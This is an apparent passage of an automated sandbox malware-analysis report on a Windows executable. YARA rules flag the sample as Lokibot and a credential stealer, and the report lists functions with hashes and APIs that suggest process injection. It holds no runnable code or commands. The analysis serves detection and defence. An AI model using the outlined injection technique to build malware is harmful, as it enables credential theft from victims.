MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:38:18
Start date:	22/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xbf0000
File size:	600'576 bytes
MD5 hash:	66B03D1AFF27D81E62B53FC108806211
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.3131214970.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	11:38:18
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:38:20
Start date:	22/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	185
Total number of Limit Nodes:	11

Executed Functions

Function 04B16FE8 Relevance: 18.4, Strings: 14, Instructions: 878
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C, xrefs: 04B17227
&, xrefs: 04B1780A
$dq, xrefs: 04B17503
E, xrefs: 04B17751
9, xrefs: 04B1712A
E, xrefs: 04B17641
&, xrefs: 04B17709
_, xrefs: 04B1764B
, xrefs: 04B172C6
=, xrefs: 04B17123
7, xrefs: 04B1791D
, xrefs: 04B171C2
j, xrefs: 04B179F7
x, xrefs: 04B17A54

Memory Dump Source

Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_file.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$_$j$x$$dq
API String ID: 0-452711968
Opcode ID: e048b78e223945752e3667ead2ed13a12f33704cf5342f1aac17a39e970c4c69
Instruction ID: 04d228f6788ec4ee0ce48c22b4129a27a23dc9688c3c9d0195e200aa834c60cd
Opcode Fuzzy Hash: e048b78e223945752e3667ead2ed13a12f33704cf5342f1aac17a39e970c4c69
Instruction Fuzzy Hash: 16825A30A00705CFDB15EF78C854BAAB7B2FF89304F5186A9D449AB364DB75A985CF80

Function 04B16FD8 Relevance: 18.3, Strings: 14, Instructions: 809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C, xrefs: 04B17227
&, xrefs: 04B1780A
$dq, xrefs: 04B17503
E, xrefs: 04B17751
9, xrefs: 04B1712A
E, xrefs: 04B17641
&, xrefs: 04B17709
_, xrefs: 04B1764B
, xrefs: 04B172C6
=, xrefs: 04B17123
7, xrefs: 04B1791D
, xrefs: 04B171C2
j, xrefs: 04B179F7
x, xrefs: 04B17A54

Memory Dump Source

Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_file.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$_$j$x$$dq
API String ID: 0-452711968
Opcode ID: a77273bb094670e78463193705637ff608e9c635034d5c01577992f7f7473740
Instruction ID: ee42b1c80b9a0720b37fa6caacd7f7b4bf9fd771eeeba800b3e2cc17d02e7c35
Opcode Fuzzy Hash: a77273bb094670e78463193705637ff608e9c635034d5c01577992f7f7473740
Instruction Fuzzy Hash: A0824A30A10B05CFDB15EF74C854BAAB7B2FF89304F6186A9D449AB360DB75A985CF40

Function 0674B328 Relevance: .6, Instructions: 628COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fe49d75f02c7bee28d02d7e6e2ca0fe882f5122376460572a9e165c98ab115
Instruction ID: f04ae240e7cb89e1234f756bda227c3e51ca61a9036b4cac9ddd8c91030ac60e
Opcode Fuzzy Hash: 41fe49d75f02c7bee28d02d7e6e2ca0fe882f5122376460572a9e165c98ab115
Instruction Fuzzy Hash: 5832CC70B016148FDB59EBA9C468BAEBBF7AF89700F144469E106DB3A0CB34ED01CB51

Function 06747EAD Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 067480EE

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c368fe3ae89c04709743487e29f155dc5d5589e0fea9572323df4151d9a15a44
Instruction ID: a610b449fa79e14a4fc40619587abed510ede2395cc3563e1891604ad4f930c5
Opcode Fuzzy Hash: c368fe3ae89c04709743487e29f155dc5d5589e0fea9572323df4151d9a15a44
Instruction Fuzzy Hash: D8A17C71D00219CFDF54DFA8C885BEDBBB2BF48310F1485AAE819A7250DB749985CF92

Function 06747EB8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 067480EE

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6d2637b4e95fb4c7a553a12017ffb575f316b43da688dafe97aafadc65696c2e
Instruction ID: c4626ba27d1b091151d1be78ec2c01887cff1c2b668e213c62c4e8a03369b038
Opcode Fuzzy Hash: 6d2637b4e95fb4c7a553a12017ffb575f316b43da688dafe97aafadc65696c2e
Instruction Fuzzy Hash: 0C917B71D0021DDFDB54DFA8C885BEDBBB2BF48310F1485AAE819A7240DB749985CF92

Function 0246AD08 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0246AF5E

Memory Dump Source

Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2460000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a53aa788e765b8a05a8d6acc7fbc77553fca3dc618cc450beaf53b03bbdc3d02
Instruction ID: f3bfa6edb3066cd3c6a97d2c351339674896865215fe71712b4aaf02b9467666
Opcode Fuzzy Hash: a53aa788e765b8a05a8d6acc7fbc77553fca3dc618cc450beaf53b03bbdc3d02
Instruction Fuzzy Hash: 1371F370A00B158FD724DF69D44476BBBF6FF88304F00892ED48AA7A50DB75E949CB92

Function 024658EC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 024659A9

Memory Dump Source

Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2460000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 930181643d0251594a51d0379ed988344715e5be141a123a628bac45c75f0faf
Instruction ID: dfe782976f0ae0cf6fe4745957a926b2a8bf55b67ca4005c63c8818b3ee0210d
Opcode Fuzzy Hash: 930181643d0251594a51d0379ed988344715e5be141a123a628bac45c75f0faf
Instruction Fuzzy Hash: 4741DFB0D00719CADF24DFA9C8847DEBBF1BF48314F24806AD419AB251DB76694ACF91

Function 024644B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 024659A9

Memory Dump Source

Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2460000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a6e86930a6b72f5bd2fa7bb0ad6df1a72b31bf4a17de3c70101c2efdbb3c9990
Instruction ID: 226c4802c6fb7057c9d9801b9b38236cf1f945d5ad85df1f73585ec804a797d2
Opcode Fuzzy Hash: a6e86930a6b72f5bd2fa7bb0ad6df1a72b31bf4a17de3c70101c2efdbb3c9990
Instruction Fuzzy Hash: 3741D0B0C00719CBDB24DFA9C848B9EBBF5BF49304F60806AD409AB251DB766949CF91

Function 04B14040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04B14101

Memory Dump Source

Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_file.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c1024348a240e83e9779a479988e6094f39a79f0709abcc581003e901fcb787f
Instruction ID: 64210f98159338a4a9b35836c771cdd5d5b10f85bd1beddc7f81bb10381a00d9
Opcode Fuzzy Hash: c1024348a240e83e9779a479988e6094f39a79f0709abcc581003e901fcb787f
Instruction Fuzzy Hash: 774157B5A00309DFCB14CF99C848AABBBF5FB88314F24C499D519AB321D774A845CFA0

Function 06747C28 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06747CC0

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1b6fcbde681ced9b30fc4ec7856479fd5ec817ddfa2df4e43ee2905aefd1c080
Instruction ID: c730c93c1de9d17f76060b7b1209177af46a8233a7f84b88617e85f9fd2cfb2e
Opcode Fuzzy Hash: 1b6fcbde681ced9b30fc4ec7856479fd5ec817ddfa2df4e43ee2905aefd1c080
Instruction Fuzzy Hash: 6B2126B19003099FCB54DFA9C885BEEBBF5FF48310F108429E919A7240D778A944CBA4

Function 06747C30 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06747CC0

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1240569a4308b753f76ec59b469f7402fe5277b77e7c86423db5efcb95edccfb
Instruction ID: 4e2ae1e14a862be349c9e11ea257587e0a9be8173c5c050016113f5a5501e13d
Opcode Fuzzy Hash: 1240569a4308b753f76ec59b469f7402fe5277b77e7c86423db5efcb95edccfb
Instruction Fuzzy Hash: A72127B19003099FCB14DFA9C885BEEBBF5FF48310F108429E919A7240C7789944CBA4

Function 06747D18 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06747DA0

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fc3b48df52e060e59284e5e8a416dc65865cb6798db1c82f69c724941f454bd9
Instruction ID: dcce7bbe5ba2c1a6f0eb8dbd08afd7dd9d60650320728199d61c5e106492a0a9
Opcode Fuzzy Hash: fc3b48df52e060e59284e5e8a416dc65865cb6798db1c82f69c724941f454bd9
Instruction Fuzzy Hash: 7D2136B1C003099FCB10DFAAC885AEEBBF5FF48310F108429E518A3240C739A905CFA4

Function 0246D1DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0246D5B6,?,?,?,?,?), ref: 0246D677

Memory Dump Source

Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2460000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a5df79f7653335695132fee6b01c2754f842d4f06cffd2e8f3a61ce1084b56f5
Instruction ID: 744f4d9353ee4ea3f9cdeca13f8d617236a460c3e92f158bedb96a7c14c28c84
Opcode Fuzzy Hash: a5df79f7653335695132fee6b01c2754f842d4f06cffd2e8f3a61ce1084b56f5
Instruction Fuzzy Hash: E421E3B5D00209EFDB10CF9AD984AEEBBF4EB48314F14841AE918A7350D374A954CFA5

Function 06747A92 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06747B16

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a5ea79327e0f2110b3ecedcad38aedb5029c3591d86af9eb0994d6bc286004e3
Instruction ID: c7f62c2a94cf4d8196c171c36fb854c204794850db94613f254f3902482a796f
Opcode Fuzzy Hash: a5ea79327e0f2110b3ecedcad38aedb5029c3591d86af9eb0994d6bc286004e3
Instruction Fuzzy Hash: B3215971D003099FCB14DFAAC885BAEBBF5EF48320F148429D519A7240C778A944CFA4

Function 0246D5E9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0246D5B6,?,?,?,?,?), ref: 0246D677

Memory Dump Source

Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2460000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e1980ddbb0e238afe810c4d838887a53b00a9068dcd34aaad517d139dcdccbfc
Instruction ID: d9058d59b00f78aef935d309b095d664ca3ea6d03326250ceb36d2d477c50af7
Opcode Fuzzy Hash: e1980ddbb0e238afe810c4d838887a53b00a9068dcd34aaad517d139dcdccbfc
Instruction Fuzzy Hash: A421E3B5900209EFDB10CFAAD984ADEBBF5EB48324F14841AE918A3350C374A945CF65

Function 06747D20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06747DA0

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4776c11d160541aeb99d440c8ba9df63eb816188e31418a454f98955472031b3
Instruction ID: 399e2bd879b86394c28f0d3e41aaf92252d099e7b7b93a5da9f9f51c659b4243
Opcode Fuzzy Hash: 4776c11d160541aeb99d440c8ba9df63eb816188e31418a454f98955472031b3
Instruction Fuzzy Hash: 742128B1D003499FCB10DFAAC845AEEFBF5FF48310F508429E559A7240C734A944DBA5

Function 06747A98 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06747B16

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 80983db05e2b9fee182ba507724caa9ae8ea34b569737d3a9b6e3945282cf6da
Instruction ID: ca70a3943b72cdfc3bb9e6c59998e578882ddcc83db2138b8a718721f22efa4f
Opcode Fuzzy Hash: 80983db05e2b9fee182ba507724caa9ae8ea34b569737d3a9b6e3945282cf6da
Instruction Fuzzy Hash: 222179B1D003098FCB14DFAAC8857EEBBF5EF48320F10842AD419A7240CB78A944CFA4

Function 06747B68 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06747BDE

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5dde520abf31562c5804eff9de7f4328f18f0d506ac9ad056a2372d4107ecac3
Instruction ID: a996e9c5e0354553c3a5cd1dca3d927bf599c9c36deebdb54cdbd226904a7734
Opcode Fuzzy Hash: 5dde520abf31562c5804eff9de7f4328f18f0d506ac9ad056a2372d4107ecac3
Instruction Fuzzy Hash: 45115672900209DFCB10DFAAC845ADEBBF5EB88320F248819E519A7250CB35A940CFA4

Function 06747B70 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06747BDE

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e78a8d156f6ecf5dbe5326b1132bd8798c3d2433d26daa7c2c039dab6866243b
Instruction ID: 3be633b08b20c80fc48cffd8ecb65def928ac45191a03b04d26b7bdd7dc8f554
Opcode Fuzzy Hash: e78a8d156f6ecf5dbe5326b1132bd8798c3d2433d26daa7c2c039dab6866243b
Instruction Fuzzy Hash: 16113771900249DFCB14DFAAC845ADFBFF5EF88320F248819E519A7250CB75A944CFA5

Function 067475A8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06747612

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2d09cc12bef049824b7c138e6e047076bacee53dc29968be0dfd16aabcf3b74f
Instruction ID: e09ba7c0d97773e2290abe6107991b272f2d223f3c30d84d34637bec553ce293
Opcode Fuzzy Hash: 2d09cc12bef049824b7c138e6e047076bacee53dc29968be0dfd16aabcf3b74f
Instruction Fuzzy Hash: 571128B1D003498FDB14DFAAC8497DEFBF5EB88324F248819D519A7240CB79A944CBA5

Function 067475B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06747612

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1b82d26cf012150ea28a1978801bc5c10d1fe3bbca6f607f0f1e18b7ae664194
Instruction ID: 6c72bcae39641221c2c3a92d84781284541e78320e42db779e8a40d5dd5dbb38
Opcode Fuzzy Hash: 1b82d26cf012150ea28a1978801bc5c10d1fe3bbca6f607f0f1e18b7ae664194
Instruction Fuzzy Hash: 7E113AB1D003498FCB14DFAAC8497DEFBF5EB88324F248819D519A7240CB75A944CBA5

Function 0674A6B8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0674A71D

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0d6fdc9f00f2287605f7f48b3ddd7019b951f0ea2714fbcc6a67eb5e7e617cd1
Instruction ID: 656bc02d744b26d9e73c4aac82398e06d0fe2d65ea7d369b37444c5711400761
Opcode Fuzzy Hash: 0d6fdc9f00f2287605f7f48b3ddd7019b951f0ea2714fbcc6a67eb5e7e617cd1
Instruction Fuzzy Hash: CB1106B5800349DFDB20DF9AD889BDFBBF8EB48320F10841AE519A7640D375A544CFA5

Function 06744818 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0674A71D

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1e1d22fd91ee0eceebab4c66d406ea06ebdab66a7456935ddf4a4dcd17939b18
Instruction ID: d41c3eca716f5be0d9865545abe47eb9b11025cefb3a1255c3488caacc780a60
Opcode Fuzzy Hash: 1e1d22fd91ee0eceebab4c66d406ea06ebdab66a7456935ddf4a4dcd17939b18
Instruction Fuzzy Hash: FF1103B5800349DFDB20DF9AC889BDEBBF8EB48320F10841AE519A7240D375A944CFA5

Function 0246AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0246AF5E

Memory Dump Source

Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2460000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 771d7aca7cc2bf6b73d089ce96bdadef84b06d713956110cbe03bb072758a94e
Instruction ID: e1986f02740e4a75058cbe0665426fba38aaee28484b3ef875c6083892ed9d62
Opcode Fuzzy Hash: 771d7aca7cc2bf6b73d089ce96bdadef84b06d713956110cbe03bb072758a94e
Instruction Fuzzy Hash: 4D110FB6C007498FCB14CF9AC848A9EFBF4EB88224F10845AD419B7200C379A545CFA6

Function 067475B7 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06747612

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 904fec8fa9771bda75bdc6c72d2dfffada09790d4eb2551bd74e8ba2b32c3a9f
Instruction ID: 45847e01a14d33a8cb5bac5d3277064d5dbc779f356d1619320c34f1fd2fbe0b
Opcode Fuzzy Hash: 904fec8fa9771bda75bdc6c72d2dfffada09790d4eb2551bd74e8ba2b32c3a9f
Instruction Fuzzy Hash: C91166B19043498FCB10DFA9C4457EEFFF1AF88314F24885EC159A7240CB349944CB95

Function 0232D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890602136.000000000232D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0232D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_232d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9282b83a30a6d2220a05e699973470a62ff65720c1d119ca8049f92a7b0bd30f
Instruction ID: bb9ab18e4e762f35356a994b5aae5b61a74377451884c5c7e997d431079641b9
Opcode Fuzzy Hash: 9282b83a30a6d2220a05e699973470a62ff65720c1d119ca8049f92a7b0bd30f
Instruction Fuzzy Hash: 72213A71604248DFDB05DF14D9C0B26BFA9FB94318F34C569E80A0B656C376D45AC7A1

Function 0233D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_233d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed315b5e418e23dda69ef05c5a25be6eca70689b8174a3d1e5233dd4fa918c0f
Instruction ID: 52b4e270d6fc093626270aa7f38148f06dbd7c393c9b4ca0f5e675fe728f9e06
Opcode Fuzzy Hash: ed315b5e418e23dda69ef05c5a25be6eca70689b8174a3d1e5233dd4fa918c0f
Instruction Fuzzy Hash: DB213B71614308EFDB06DF14D9C4B25BBA5FB84314F24C66DE80A8B352C736D516CB61

Function 0233D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_233d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0390fdb0d35cd122023574c88af1da2dcb14bfe9c3f249186d7a78a966d0ef
Instruction ID: e4d0628694f87dd6552b56a9782a50baf0cfbd2a9170ad507a46827c2b6dd093
Opcode Fuzzy Hash: be0390fdb0d35cd122023574c88af1da2dcb14bfe9c3f249186d7a78a966d0ef
Instruction Fuzzy Hash: 4C2125B1604208DFDB16DF14D8C4B16BBA5FB84714F20C56DD80A0B356C336D507CB61

Function 0233D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_233d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
